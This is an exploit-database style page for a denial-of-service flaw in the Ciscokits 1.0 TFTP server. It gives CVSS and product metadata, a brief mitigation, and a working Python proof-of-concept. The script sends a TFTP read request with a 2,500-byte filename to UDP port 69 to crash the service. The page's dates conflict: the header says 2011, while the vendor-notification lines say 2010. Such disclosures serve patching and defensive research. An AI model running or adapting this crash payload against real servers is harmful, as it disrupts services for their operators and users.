Ciscokits 1.0 TFTP Long Filename DoS

vendor:

Ciscokits

by:

Craig Freyman

7.5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: Ciscokits

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: N/A

CPE: a:certificationkits:ciscokits

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2011

Ciscokits 1.0 TFTP Long Filename DoS

When a long file name read request is made the CPU will spike and within about 20 seconds the TFTP service will crash.

Mitigation:

Ensure that the TFTP server is configured to limit the length of filenames.

Source

Exploit-DB raw data:

#!/usr/bin/python
#Title: Ciscokits 1.0 TFTP Long Filename DoS
#Author: Craig Freyman (@cd1zz)
#Date: July 22, 2011
#Software Link: http://www.certificationkits.com/tftpserver/tftpserver.zip
#Tested on: Windows XP SP3
#Vendor notified: July 22, 2010 - Vendor approved release of PoC on July 23, 2010. 
#Notes: When a long file name read request is made the CPU will spike
#and within about 20 seconds the TFTP service will crash.

import socket,sys,time

host = '192.168.133.128'
port = 69

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
	print "socket() failed"
	sys.exit(1)

crash = "\x41" * 2500

mode = "netascii"
files = "a"
print "File name READ crash"
#seems to only work on a READ command = x01
pwned = "\x00\x01" + crash + "\0" + mode + "\0"
s.sendto(pwned, (host, port))
time.sleep(2)